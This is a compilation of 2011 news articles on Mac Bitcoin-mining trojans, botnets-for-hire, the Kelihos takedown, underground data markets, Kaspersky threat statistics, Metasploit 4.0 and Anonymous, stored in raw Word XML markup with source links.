processing unit (GPU) resources are much better than regular CPUs at performing intensive mathematical calculations required for Bitcoin mining.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collects system information such as shell and browser history, takes screen captures, opens a proxy port and waits for the user to enter the user name and password, performs a scan for private files on the system and on mounted encrypted volumes using Spotlight, posting data files and looking for other infected Macs.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Trojan also hunts for any files that may contain adult content, but Sophos researchers were not clear whether it was distributing the material or acting as a vigilante to uncover objectionable material, according to Cluley.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is "complex," as it can perform tasks associated with several classes of malware, including a Trojan horse, backdoor, data-stealer and spyware, Intego said. Another variant uncovered by Intego saves the user's keychain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"Clearly, Mac users-like their Windows cousins-should practice safe computing and only download software from official Websites and legitimate download services," Cluley said, adding that Mac users need to start practicing safe security instead of thinking the platform is impervious to malware.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security researchers uncovered a Mac Trojan that masqueraded as a Flash Player installer and another that hijacked Mac OS X systems to launch denial of service attacks against other computers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>eWeek 2011.11.01 02:26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.eweek.com/c/a/Security/New-Mac-Malware-Part-Trojan-Data-Stealer-Spyware-BitCoin-Miner-313602/</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Illicit Bitcoin miners steal resources from infected Macs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Passwords, browsing history also harvested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Goodin in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researchers have identified malware that hijacks the resources of infected Macs to illegally mint the digital currency known as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DevilRobber.A trojan has been circulating on The Pirate Bay and other BitTorrent trackers, where it's bundled with the Mac OS X image-editing application Graphic Converter, researchers from Sophos blogged on Monday. Like previous malware attacking Windows PCs, it commandeers a Mac's graphics card and CPU to perform the mathematical calculations necessary to generate new digital currency, a process known as Bitcoin mining.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researchers from rival antivirus provider Intego point out in their own blog post, Bitcoin mining is just one of the many activities performed by the recently discovered trojan.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Б─°This malware is complex, and performs many operations,Б─² they wrote. Б─°It is a combination of several types of malware: it is a Trojan horse, since it is hidden inside other applications; it is a backdoor, as it opens ports and can accept commands from command and control servers; it is a stealer, as it steals data and Bitcoin virtual money; and it is a spyware, as it sends personal data to remote servers.Б─²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hijacking a Mac's GPU and CPU for Bitcoin mining, DevilRobber.A also searches an infected machine for any Bitcoin wallets. If found, the malware will purloin the digital currency. It also steals passwords, browsing history from Safari browsers, and data from Vidalia, a Firefox plugin used to communicate over the TOR anonymity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DevilRobber.A has been installed on only a small number of machines. But it's part of a growing wave of increasingly sophisticated malware targeting Mac users. Over the past month, at least two other OS X trojans have also been discovered, including Tsunami, which is derived from an earlier Linux-infecting backdoor called Kaiten, and Flashback, which was recently updated to make it harder for researchers to do reconnaissance on it.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2011.10.31 23:45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.theregister.co.uk/2011/10/31/mac_os_x_bitcoin_mining_trojan/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Hacker Mercenaries, Weaponized Botnets a Growing Threat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Joshua Philipp Epoch Times Staff Created: Oct 18, 2011 Last Updated: Oct 19, 2011 Tweet | | Related articles: United States &gt; National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Taken at The Chaos Computer Club, Germany. The real concern is about the groups that are lesser known. (Sean Gallup/Getty Images) The presidential and defense websites slipped offline, Internet communications were down, and major media were inaccessible. While the Georgian government tried to cope with the country falling into darkness, Russia launched a physical assault with soldiers and tanks.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main weapons of choice in the 2008 cyberwar was a botnet-a network of infected computers sometimes referred to as "zombie armies," which work as slaves to a master computer. The main attack from a botnet can take websites offline by overloading them, known as a distributed denial of service (DDoS) attack.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something unique about this particular botnet though. "When Russia rolled into Georgia they hired a botnet to shut down the country," Matthew Jonkman, president of the Open Information Security Foundation, in a phone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years ago and they've gotten even better," Jonkman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 underground has grown since the 2008 attacks. Hackers can now be hired through underground forums using anonymous payment methods like BitCoins, botnets can be rented for as little as $5 an hour, and nearly any target can be taken offline or compromised for the right price.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designed to knock Web sites off line happen every day, yet shopping for a virtual hit man to launch one of these assaults has traditionally been a dicey affair," states Brian Krebs on his popular cybersecurity blog, Krebs on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starting to change: Hackers are openly competing to offer services that can take out a rival online business or to settle a score," Krebs states. Hackers for Hire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Russia-Georgia cyberwar, as well as the Estonia-Russia cyber conflict of 2007, are often referenced as examples of what cyberwar is capable of. Although the attacks on Estonia-one of the world's most wired countries-did not involve physical attack, virtually the whole country came to a standstill as banks, communications, and government fell victim to cyberattacks.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in 2007, however, much of the world was still ignorant of the devastating potential of cyberwar. The risks only came to the forefront after hacker group Anonymous Operations began its "Operation Payback" attacks on companies including Mastercard and PayPal in 2010, retaliating against government actions on information-leaking website WikiLeaks.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attacks, and the highly publicized attacks from hacker group LulzSec that came later, highlighted the rise of a new kind of threat. With that, the eyes of the world opened to the flimsy foundation that much of the Internet is built on-one riddled with holes that can be stopped on little more than a whim.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terrible truths of the attacks by Anonymous and LulzSec is that neither group is necessarily skilled when compared to the hacker elite. The majority of them use software or pre-written scripts to launch their attacks-hackers refer to them as "script kiddies," unworthy of being called hackers. Thus, the companies that have fallen victim to their attacks, often fell to some of the most basic attacks there are-highlighting again the despondent state of digital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these groups have garnered the most attention, the real concern is about the groups that are lesser known-terrorist organizations, state- affiliated hacker groups like the Chinese Honker Union and the Russian Business Network, and the underground elite ("leet") of the hacker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Secretary of the Department of Homeland Security (DHS) Janet Napolitano stated "The U.S. has become ‘categorically safer' since 9/11, but cyber-terrorism now tops the list of security concerns."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jihadists are already springing up around the Web, while many, like the Tariq bin Ziyad digital terrorist organization, even offer to train new members who know little or nothing about hacking.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added threat, however, is that these groups could pull from the same resources as Russia did during their attack on Georgia-weaponizing a botnet, or going to the hired guns on the digital front. "Just as organized crime groups have hired hackers, it is possible that nation states could hire or distantly support jihad networks and launch cyber-attacks through them," states an April 17 report from Project Cyber Dawn, part of The Cyber Security Forum Initiative.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concern over groups like Anonymous and lesser-skilled yet active groups like the Iranian Cyber Army are less about where they are now, and much more about what they could become.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DHS posted a bulletin on Oct. 17 warning that Anonymous may be planning attacks on critical infrastructure, including energy companies and industrial control systems. It adds that while the group seems to lack the ability to hit such targets currently, they may develop the skill.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poor state of today's cybersecurity leaves major gaps. "What we have is in a very fragile state, so anybody who does get organized and goes after it could cause serious damage," Jonkman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a lot of groups, like the Iranian Cyber Army, launch many of their attacks for bragging rights-maybe defacing someone's website with their logo and a statement. The concern though is that the lesser skilled groups could also pull from the more elite guns-for-hire.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 Task Force to Measure Potential Cyberattack Impact on Power Grid "The ones we should worry about are the ones we don't know about, and the state- sponsored stuff. Now, these groups can make a lot of noise or be hired by an organization or country to do something," Jonkman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could pose a very significant threat, more than the overall threat in general," he said.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Epoch Times 2011.10.19 11:21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.theepochtimes.com/n2/united-states/hacker-mercenaries-weaponized-botnets-a-growing-threat-62999.html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Microsoft delivers fatal blow to yet another botnet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Kelihos, we hardly knew ye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Goodin in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said it delivered a fatal legal blow to Kelihos, a botnet that stole sensitive personal information stored on computers it infected, and was capable of delivering almost 4 billion spam messages per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takedown was achieved in part by obtaining a secret court order shutting down 21 internet addresses, including cz.cc, a free domain name registration service based in the Czech Republic. The underlying lawsuit was unsealed only after the command and control servers that relied on the domains were severed from the internet, making it impossible for the 42,000 or so infected computers to receive updated software and instructions from the Kelihos operators.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knockout is the third time Microsoft has combined its technical and legal might to disrupt a botnet menacing its customers. In March, Redmond took credit for bringing down Rustock, a rogue network that turned about 1.6 million PCs into spam-spewing monsters. That achievement came after Microsoft worked to identify the domains and servers used to administer Rustock, so they could be confiscated all at once.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Ironically, Kelihos code bore a striking technical resemblance to Waledac, another spam botnet that Microsoft disabled early last year. Redmond's lawyers swooped down on Kelihos after some researchers suspected it was an attempt to rebuild Waledac.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Б─°The Kelihos takedown is intended to send a strong message to those behind botnets that it's unwise for them to simply try to update their code and rebuild a botnet once we've dismantled it,Б─² Richard Domingues Boscovich, a senior attorney in Microsoft's Digital Crimes Unit, wrote in a blog post published Tuesday. Б─°When Microsoft takes a botnet down, we intend to keep it down Б─" and we will continue to take action to protect our customers and platforms and hold bot herders accountable for their actions.Б─²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complaint filed in US District Court in Alexandria, Virginia, named 22 John Doe defendants, along with dotFREE SRO and Dominique Alexander Piatti, the business and individual owners respectively of the cz.cc service that issued more than 3,700 subdomains that infected computers that were used to connect to the Kelihos command and control servers. Kelihos operators then sent instructions causing the machines to pump out spam promoting illegal pharmaceutical drugs and to upload email addresses, FTP login credentials, and Bitcoin wallets.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Boscovich, Piatti's service was associated with other internet scams, including a bogus piece of antivirus software called MacDefender, which caused Apple support calls to spike earlier this year when huge numbers of Mac users were tricked into installing it. In May, Google blocked more than 200,000 cz.cc subdomains and reported that they were hosting malware before eventually reinstating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Microsoft has obtained the cz.cc domain, it is working with Piatti to determine which ones are being used legitimately, so customers of his can get back online quickly.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IDG News, which reported the takedown earlier, Piatti declined to comment for the article except to say: Б─°I would be glad to give you my side of the story, but I feel that I should hire a lawyer first.Б─²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2011.09.28 02:42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.theregister.co.uk/2011/09/27/microsoft_kelihos_botnet_takedown/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Spookie just stole your password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Ishan SrivastavaIshan Srivastava, TNN | Sep 4, 2011, 07.04AM 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Playstation Network hacked: 70 million users' personal data stolen. Citibank's credit card data stolen: 200,000 accounts affected. AT&amp;T's website attacked: 114,000 email addresses of iPad customers out in the open. Just a short trailer to the hackers' underground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think these thefts are limited to only credit cards and email IDs, consider this. RSA Security, makers of SecurID token that is widely used in financial and defense industry, said its security system installed at US defense firm Lockheed Martin had been breached. Add to this list Nasdaq, Google and the US Defense Department. And these are just incidents in 2011. So where does all this data go? Who sells it? Who buys it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>This is a marketplace where sellers and buyers go with monikers like 'Maggie' and 'Spookie'. Here, stolen goods such as email passwords, credit card details, hacking toolkits and intellectual property of large firms are advertised in chat windows. This is a place where you can do a 'trial' of a few credit cards before buying hundreds of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2008 Symantec report on the 'Underground Economy', this fledgling industry's total estimated value of goods advertised was pegged at $276 m during 2007-08 alone. And this does not take into account activities like cashing out bank accounts or maxing out credit cards. These are illegal means of accessing bank accounts and withdrawing cash and using up all available credit in the case of cards. By that measure, the potential worth of credit cards advertised during this period was $5.3b, while the worth of bank accounts advertised stood at $1.7b.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FORCES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markets are like online retailers, say, eBay, adept at matching buyers and sellers," says UK-based Jelle Niemantsverdriet, principal consultant, Forensics and Investigative Response, EMEA at Verizon Business Security Solutions. "You can see the goods on sale and even request for a trial. Buyers and sellers have ratings attached to them based on how 'trustworthy' they have been in past transactions. Ironic, isn't it?" he smiles.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Bulk buyers, of course, get a discount. "The wide range in prices of credit cards, for example, may be a reflection of simple supply and demand, where higher bulk availability results in lower prices and rarer cards are advertised at higher prices," said Shantanu Ghosh, VP and MD, India Product Operations,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of sensitive data, which may include trade secrets or defense blueprints, can reach anything from $50,000- $100,000. "It's actually hard to put a price on these documents. One document can be critical to a multi- million dollar project," says Niemantsverdriet. "It's very difficult for hackers to find buyers for such sensitive documents, and for us to track such transactions."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and sellers connect with each other mainly through IRC (Internet Relay Chat) that allows group as well as private communication between users sitting in 'channels', which are like places for discussion. IRC servers can be interconnected to form big networks and accommodate hundreds of users, thus forming big 'markets'.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>There are also web-based discussion forums and instant messaging clients for communicating. To get access to any of them, you have to be trusted. You need to be 'vouched for' by members of the community. And then you need to grow in 'reputation' within these forums.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TRANSFER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Payments are usually electronic as they are instant, available worldwide and hide identity better. In fact, online currencies account for around 63% of all transactions. These include e-gold (an electronic currency backed by physical gold) and Bitcoins (a peer-to-peer currency with no central authority to issue money or track transactions). Exchange of goods and services also take place through PayPal (it allows payments to be made through the internet) and wire payments. "In one case, hackers asked for 10 LCD TVs in exchange for stolen data," says Niemantsverdriet.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Sometimes, hackers extort money directly from companies they steal data from. "In one instance, an attacker had all the critical passwords of all locations of a company. He demanded $60,000 per location. The company had operations in 50 locations. So you can imagine the scale," says Australia- based Mark Goudie, managing principal, Asia-Pacific, Investigative Response at Verizon. But according to experts, these threats mostly turn out to be false alarms as the attacker is not as capable as he claims.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Symantec report says one of the top-rated sellers, 'Maggie', alone advertised goods worth $144,448 (and a potential worth of $6.4m) during 2007-08. The total potential worth of goods advertised by the top three sellers in underground markets during the same period was $12.9m.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 ROBBERY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how are accounts hacked? Through a mix of targeted and random attacks. Security firm McAfee brought out a report earlier this year where it documented a hacking operation termed 'Shady RAT', where sensitive data from over 70 companies in 14 countries was stolen. Most attacks are what Niemantsverdriet terms 'backdoor robbery'. Profit is the primary motive. "They go about looking at every house in the neighbourhood and steal wherever the owner has forgotten to lock the backdoor," he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hackers' profiles have been frequently discussed, it's the profile of buyers which draws attention. According to Verizon's 2011 Data Breach Investigation Report, around 60% of the buyers belong to organized crime groups, having operations both online and in the real world. They act like mini enterprises and have an outsourcinglike model where each step - hacking, doing payments, making bank accounts available - is given on contract to a different individual, the end result being that the transaction is difficult to trace. And these people are spread all over the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worldwide have now begun to take serious note, with arrests of many high-profile hackers in recent times following suit. But does this dissuade some of the smaller ones? Not really, as their numbers are still growing. This is borne out by the increasing frequency and audacity of these attacks. And their target includes everyone - private and public companies, national governments as well as global institutions. But, sadly, "Government spending has so far been reactive and not spent in an efficient way," says Jeffrey Carr, a US-based cyber intelligence expert and principal of GreyLogic, a security consultancy firm. Time to double-lock the backdoor then.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Times of India 2011.09.04 05:48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://timesofindia.indiatimes.com/headlines/home/sunday-toi/special-report/Spookie-just-stole-your-password/articleshow/9855732.cms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GPU Roaring? You May Be Infected With a Bitcoin Trojan Says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Creative virus could make up to $97,000 USD a month if it can infect 100,000 machines, researchers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this piece of trojan as an entrant for the title of the world's least subtle malware. Security researchers at Symantec Corp. (SYMC) have discovered a trojan, which they've dubbed "Trojan.badminer" [database entry], that exhibits a highly unusual attack behavior.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trojan targets users' GPUs and CPUs, using them in a botnet scheme. But rather than simply sending spam, like your average botnet, the attacker uses the infected machines as brute-force tools to mine for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 crypto-currency that's growing in popularity are currently in the process of being "seeded" -- a way of establish an initial amount of circulation. Miners can set their hardware to work trying to solve difficult cryptographic problems. Occasionally, if their hardware is powerful enough, they will obtain proof of work for a problem, which leads to a reward of 50 new Bitcoins, according to the current scheme embraced by Bitcoins international proponents. At today's market value, that's a reward of almost $544 USD.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 researcher Poul Jensen describes how the new Trojan abuses the mining process, writing, "With the advent of Trojan.Badminer and common usage of fast graphics cards, it may well begin to make economic sense to rent botnets in order to carry out distributed Bitcoin mining and run the process on an industrial scale."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Peter Coogan, another Symantec researcher, turned heads in June when he suggested that cyber-criminals could use a Bitcoin botnet of 100,000 machines to make $97,000 USD a month. At that rate, Bitcoin mining becomes in close contention with other botnet profiteering schemes like spamming.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because you don't have a top-of-the-line gaming GPU doesn't mean your home computer is safe from "badminer". While a GPU can crunch hashes 750 times faster than a CPU, or more, the trojan will put CPUs to work on the task as well.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is the latest setback to Bitcoin, which has recently experienced massive swings in market value and a major security breach at its biggest currency exchange -- Mt. Gox.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the new virus, it seems that the threat on the GPU side may be a bit overstated. Bitcoin clients heavily tax GPUs, meaning that they will be very noisy when the client is running. So the next time your GPU is inexplicably screaming like a wailing banshee, you might want to do a malware scan - you may be infected with a Bitcoin trojan.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CPU infections would likely be more subtle.)</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2011.08.18 00:23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.dailytech.com/GPU+Roaring++You+May+Be+Infected+With+a+Bitcoin+Trojan+Says+Symantec/article22474.htm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Malware steals virtual currency using victim's own GPU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theft meets parallel computing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Goodin in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Imagine a burglary ring that pierced locks using a victim's own drills and saws, and you get the idea behind a recently discovered piece of malware that filches the digital currency known as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new research from antivirus provider Symantec, Trojan.Badminer harnesses the immense power of an infected machine's graphical processing units to crack the digital wallets that protect the virtual coins. General purpose GPUs far outstrip CPUs at performing floating-point math calculations and can do so in massively parallel software threads, making them a superior platform for trying huge numbers of possible keys needed to defeat the encryption safeguarding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Б─°This makes the idea of GPGPU extremely attractive for the purpose of bitcoin mining, brute force hash attacks against password databases, and folding (the processing of simulating protein folding, a project initiated by Stanford University known as Folding@home),Б─² Symantec researcher Poul Jensen wrote in a post published Tuesday.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infected computer that contains an AMD Radeon 6990 CPU could process about 758.82 million cryptographic hashes per second, he wrote. That's a far cry from an Intel's Atom N270 netbook CPU, which is capable of handling just 1.19 Mhash/s.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Jensen went on to theorize other ways criminals could use GPUs to mint Bitcoins, including through a practice known as mining. That's the term for solving difficult cryptographic problems and being rewarded with 50 Bitcoins for each per correct block. As fellow Symantec researcher Peter Coogan surmised in June, a botnet of 100,000 machines that worked on a problem continuously would earn just $97,000 a month. That's a paltry amount compared to other botnet enterprises, such as stealing online banking credentials.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Б─°With the advent of Trojan.Badminer and common usage of fast graphics cards, it may well begin to make economic sense to rent botnets in order to carry out distributed bitcoin mining and run the process on an industrial scale,Б─² Jensen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crooks investing resources into Bitcoin theft still must grapple with another challenge: The price of the highly decentralized coin fluctuates wildly. It has reached exchange rates as high as $29, but has plummeted since then, with the current price a little more than $11.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2011.08.16 23:40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.theregister.co.uk/2011/08/16/gpu_bitcoin_brute_forcing/</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Malicious sites concentrated in 10 countries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Dubai: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87 percent of the websites used to spread malicious programs were concentrated in just 10 countries, according to a study by Kaspersky Lab.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company's experts have identified a number of important trends after analysing vast numbers of IT threats during the second quarter of 2011, it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Navigating the web remains the riskiest activity on the Internet with malicious URLs that serve exploit kits, bots, ransomware Trojans, etc. being the most frequently detected objects (65.44 percent) online, the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two places in the "top 10" countries were occupied by the US (28.53 percent) and Russia (15.99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Netherlands leads the way in reducing the number of malicious hosting sites: compared to the previous quarter, its share has fallen by 4.3 percentage points to 7.57percent. This is down primarily to the efforts of the Dutch police and includes the neutralizing of botnets such as Bredolab and Rustock, the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Countries have been divided into groups according to their online threat levels- High-risk countries (41-60 percent unique users subject to web attacks). This group includes: Oman, Russia, Iraq, Azerbaijan, Armenia, Sudan, Saudi Arabia and Belarus. Newcomers to this group in Q2 were Sudan and Saudi Arabia, while Kazakhstan dropped down a level.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risk group (21-41percent). This group was made up of 94 countries, including: US (40.2 percent), China (34.8 percent), UK (34.6 percent), Brazil (29.6 percent), Peru (28.4 percent), Spain (27.4 percent), Italy (26.5 percent), France (26.1 percent), Sweden (25.3 percent) and the Netherlands (22.3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at 40.2 percent, is very close to joining the high-risk group of countries due to the increase in the number of FakeAV detections, a statement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Safe-surfing countries (11.4-21 percent). This group comprised 28 countries and included Switzerland (20.9 percent), Poland (20.2 percent), Singapore (19.6 percent) and Germany (19.1 percent). In the second quarter of 2011, five countries left this group, including Finland which entered a higher risk group with 22.1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was among the top 10 countries in which users' computers ran the highest risk of local infection. Every second computer in the country was at risk of local infection at least once in the past three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few years, India has been growing steadily more attractive to cybercriminals as the number of computers in the country increases steadily. Other factors that attract the cybercriminals include a low overall level of computer literacy and the prevalence of pirated software that is never updated," said Yury Namestnikov, senior virus analyst, Kaspersky Lab.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five safest countries in terms of the level of local infections are: Japan (with 8.2 percent of unique users affected), Germany (9.4 percent), Denmark (9.7 percent), Luxembourg (10 percent) and Switzerland (10.3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very first time in its history, the Top 10 rating of vulnerabilities includes products from just two companies: Adobe and Oracle (Java), with seven of those 10 vulnerabilities being found in Adobe Flash Player alone.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products have disappeared from this ranking due to improvements in the automatic Windows update mechanism and the growing proportion of users who have Windows 7 installed on their PCs,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Hacking of major companies has increased with the list of victims including Sony, Honda, Fox News, Epsilon and Citibank.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evidence surrounding the hacking of Sony's services shows that the main objective of the hackers was not to earn a quick buck, but rather it was part of a wave of "hacktivism" - hacking or bringing down systems in protest against the actions of governments or large corporations - which is continuing to gain momentum.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first quarter of the year, a new group called LulzSec emerged, which in 50 days succeeded in hacking a number of systems and publishing the personal information of tens of thousands of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fake antivirus programs detected globally by Kaspersky has also begun to increase with the number of users whose computers blocked attempts to install counterfeit software increasing by 300 percent in just three months, it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mobile threats targeting different mobile platforms continues to increase: detected threats running on J2ME doubled during Q2 2011, while the number of detections of malicious programs targeting Android nearly tripled. Once again malicious programs were detected in the official Android store Android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growing popularity of bitcoin, a special program that allows "money" to be generated on users' computers, is a magnet to those who seek to acquire money by illegal means. Encrypted wallets containing money can be stored on users' computers and access can be gained to these wallets by entering the right password.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users typically steal the wallets first and then try to determine the passwords afterwards.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relatively simple Trojan was detected in Q2 that sent bitcoin wallets to malicious users when launched. This led the cybercriminals to come up with the novel idea of making unsuspecting users engage in bitcoin mining for them, a statement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June, Kaspersky Lab discovered a malicious program comprised of a legitimate bitcoin mining program (bcm) and controlled by a Trojan module. After the Trojan is launched, the infected computer begins to generate bitcoins for the malicious users, it said. - TradeArabia News Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>TradeArabia 2011.08.16 12:42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://tradearabia.com/news/IT_203548.html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Metasploit 4.0 sets the stage for mass penetration testing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version of the exploitation framework adds more tools for penetration testers and IT security professionals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Joab Jackson | IDG News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product provider Rapid7 has updated its widely used open-source Metasploit exploitation framework, expanding the software so it supports enterprise IT security staff as well as its core audience of penetration testers.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"Originally the framework was focused on just running exploits. Penetration testers were our core base," said Rapid7 Metasploit chief architect H.D. Moore, referring to the security professionals who are paid by organizations to break into - and thereby document the weaknesses of - computer systems. "But now we are seeing a huge demand from organizations that just want to put all their existing vulnerability data in one spot and validate all those vulnerabilities."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Master your security with InfoWorld's interactive Security iGuide. | Stay up to date on the latest security developments with InfoWorld's Security Central newsletter.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Moore noted that penetration testers, or pentesters in the parlance of the security field, generally will only have to test a handful of systems in the course of their engagements, whereas an enterprise IT security staff may want to test thousands or even tens of thousands of computers. The new version of the software will help automate this process. "This release makes it easier to handle large amounts of data,"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this end, the new version, the first major update in more than five years, is the first that offers the ability to capture engagement information in a database, which can then be searched and analyzed with more ease.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all of the software's functionality can now be accessed through APIs (application programming interfaces). "So if you wanted to deploy 40 copies across your enterprise for automated penetration testing, it would be very easy to do," Moore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Metasploit Framework is a collection of and execution platform for known software exploits, or code that harnesses, or exploits, security vulnerabilities in software programs for unintended purposes. The framework allows users to string together multiple exploits in order to gain illicit access to a system, replicating actions that would be taken by attackers. Rapid7 acquired Metasploit from Moore in 2009, who first created the framework.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wooing the enterprise IT security staff with new features, Rapid7 also kept the pentesters in mind with this release as well.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version features 36 new exploits, 27 new post-exploitation modules - or modules designed for system reconnaissance - and 12 auxiliary modules, all of which have been added since the last update, version 3.7.1. The software package now hosts a total of 716 exploit modules, 361 auxiliary modules and 68 post-exploitation modules.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Nine of the new exploits are aimed at SCADA (supervisory control and data acquisition) systems, and others harness vulnerabilities in the Firefox and Internet Explorer browsers. Among the post-exploitation modules are capabilities for obtaining passwords from Microsoft Outlook, WSFTP, CoreFTP, SmartFTP, TotalCommander, BitCoin, and other applications.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Rapid7 has also released updated versions of Metasploit Pro, a collection of reporting tools, and Metasploit Express, which provides entry-level vulnerability verification and penetration testing capabilities.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Joab Jackson covers enterprise software and general technology breaking news for The IDG News Service. Follow Joab on Twitter at @Joab_Jackson. Joab's e-mail address is Joab_Jackson@idg.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>InfoWorld 2011.08.04 02:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.infoworld.com/d/security/metasploit-40-sets-the-stage-mass-penetration-testing-168919</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Anonymous kicks off "Free Topiary" campaign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Trent Nouveau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activists associated with Anonymous have kicked of a "Free Topiary" campaign to fund future operations and help 18-year-old Jake Davis who faces multiple hacking related charges in the UK.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Б─╗Б─╗"Jake Davis is perhaps the greatest digital graffiti artist of all time. He wrote many lulzy press releases for both Anonymous and Lulz Security. He proved his value as a spokesperson by taking on Shirley Phelps of Westboro Baptist, slaying her hateful religious zeal with over 9,000 sins," Anonymous stated in an official communiqué.</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"[Topiary] brought lulz to the oppressed. He spoke in a voice that resonated globally and reached us personally. We are sick of the twisted corporatocracy that controls us through our government, our news media, and our Internet. Jake Davis may face jail time, but he publicly spoke of this in the most noble of terms. A jail sentence is, to him, not a failure of any sort."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noted above, the group is asking digital supporters to show solidarity with Topiary by making a donation to Anonymous via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were criminals, we'd be rich. But you know that's not the case. [And so] you can donate [to us via] BitCoins," the collective stated on its AnonymousIRC Twitter account.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should Topiary be in need, rest assured that all Bitcoins donated will go his way. You [may] have sailed beneath the horizon, yet [you will] always [be] remembered. We will meet again, old friend. Promise."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Anonymous activists also reiterated it was impossible for any government to "arrest an idea," warning "the more you arrest, the worse" it will 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you cannot arrest an idea; you can neither contain it, nor censor nor silence it. 